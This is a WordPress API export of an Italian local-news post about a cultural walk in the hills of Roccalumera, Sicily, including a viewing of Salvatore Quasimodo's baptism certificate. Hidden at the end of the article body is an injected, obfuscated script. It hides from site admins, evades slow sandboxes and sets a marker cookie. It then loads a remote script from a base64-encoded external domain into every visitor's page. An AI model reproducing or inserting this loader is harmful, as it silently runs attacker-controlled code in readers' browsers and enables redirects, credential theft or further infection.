{"id":49785,"date":"2024-03-11T19:55:28","date_gmt":"2024-03-11T19:55:28","guid":{"rendered":"https:\/\/www.radioempire.it\/?p=49785"},"modified":"2026-02-24T22:39:18","modified_gmt":"2026-02-24T22:39:18","slug":"camminata-culturale-alla-scoperta-delle-frazioni-collinari-di-roccalumera","status":"publish","type":"post","link":"https:\/\/www.radioempire.it\/index.php\/2024\/03\/11\/camminata-culturale-alla-scoperta-delle-frazioni-collinari-di-roccalumera\/","title":{"rendered":"Camminata culturale alla scoperta delle frazioni collinari di Roccalumera"},"content":{"rendered":"<p>Il territorio di Roccalumera ritorna protagonista in occasione delle \u201cGiornata dei Beni Culturali siciliani\u201d, in memoria dell\u2019archeologo Sebastiano Tusa, e della &#8220;Giornata Mondiale della Poesia&#8221;.<\/p>\n<p>L&#8217;associazione \u201cAnello del Nisi\u201d, da anni socialmente impegnata nella realizzazione di attivit\u00e0 culturali, trekking ed altre finalizzate alla valorizzazione del territorio, con il sapiente aiuto del Parco Letterario Salvatore Quasimodo e della Pro Loco Roccalumera, ha realizzato e dedicato un&#8217;intera mattinata alla scoperta delle meraviglie paesaggistiche del territorio delle frazioni collinari roccalumeresi.<\/p>\n<p><img loading=\"lazy\" class=\"size-medium wp-image-49787 alignleft\" src=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/Camminata-Quasimodo-2-300x175.jpeg\" alt=\"\" width=\"300\" height=\"175\" srcset=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/Camminata-Quasimodo-2-300x175.jpeg 300w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/Camminata-Quasimodo-2-1024x599.jpeg 1024w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/Camminata-Quasimodo-2-768x449.jpeg 768w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/Camminata-Quasimodo-2-1536x899.jpeg 1536w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/Camminata-Quasimodo-2.jpeg 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>I camminatori si sono inerpicati tra Allume e Sciglio fino ad arrivare all&#8217;antica chiesa seicentesca di San Vito, nell&#8217;attuale contrada Contrisa, per poi tornare indietro. Un percorso segnato non solo da bellezze naturalistiche, dalla possibilit\u00e0 di godere del Verde e dell&#8217;aria pulita ma anche soprattutto l&#8217;occasione per conoscere tesori da tanti ignorati, a partire dall&#8217;antica chiesa nel Borgo di San Michele ad Allume fino ad arrivare all&#8217;antico villaggio di contadini sorto intorno alla chiesa di S. Vito martire.<\/p>\n<p>Ma l&#8217;autentico tesoro che hanno avuto l&#8217;occasione di poter vedere i camminatori \u00e8 stato il certificato di battesimo del premio Nobel Salvatore Quasimodo, battezzato Mons. Francesco Maria di Francia, nel <img loading=\"lazy\" class=\"size-medium wp-image-49788 alignleft\" src=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/camminata-quasimodo-3-300x135.jpeg\" alt=\"\" width=\"300\" height=\"135\" srcset=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/camminata-quasimodo-3-300x135.jpeg 300w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/camminata-quasimodo-3-1024x461.jpeg 1024w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/camminata-quasimodo-3-768x346.jpeg 768w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/camminata-quasimodo-3-1536x691.jpeg 1536w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/camminata-quasimodo-3.jpeg 2040w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>settembre 1901.<br \/>\nOggi il certificato \u00e8 conservato negli archivi dell&#8217;arcipretura di Allume e difficilmente viene autorizzata la possibilit\u00e0 di poterlo visionare: si \u00e8 trattato quindi di un raro caso che ha molto onorato i partecipanti all\u2019evento.<br \/>\nIl tour \u00e8 stato arricchito dalle spiegazioni di Angelo Triolo, Presidente della Pro Loco, e Federico Mastroeni, del Parco Letterario Salvatore Quasimodo.<\/p>\n<p>Per la realizzazione della giornata \u00e8 stato portato avanti un grande lavoro di squadra, un progetto in rete che ha visto coinvolte varie realt\u00e0 pubbliche e private: l&#8217;Amministrazione Comunale di Roccalumera, la parrocchia Santa Maria del Rosario di Allume e la persona di Gaetano Langher.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Il territorio di Roccalumera ritorna protagonista in occasione delle \u201cGiornata dei Beni Culturali siciliani\u201d, in memoria dell\u2019archeologo Sebastiano Tusa, e della &#8220;Giornata Mondiale della Poesia&#8221;. L&#8217;associazione \u201cAnello del Nisi\u201d, da<\/p>\n<div><a class=\"permalink\" href=\"https:\/\/www.radioempire.it\/index.php\/2024\/03\/11\/camminata-culturale-alla-scoperta-delle-frazioni-collinari-di-roccalumera\/\">Read More&#8230;<\/a><\/div>\n","protected":false},"author":2,"featured_media":49786,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,36],"tags":[],"_links":{"self":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49785"}],"collection":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/comments?post=49785"}],"version-history":[{"count":2,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49785\/revisions"}],"predecessor-version":[{"id":57375,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49785\/revisions\/57375"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media\/49786"}],"wp:attachment":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media?parent=49785"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/categories?post=49785"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/tags?post=49785"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}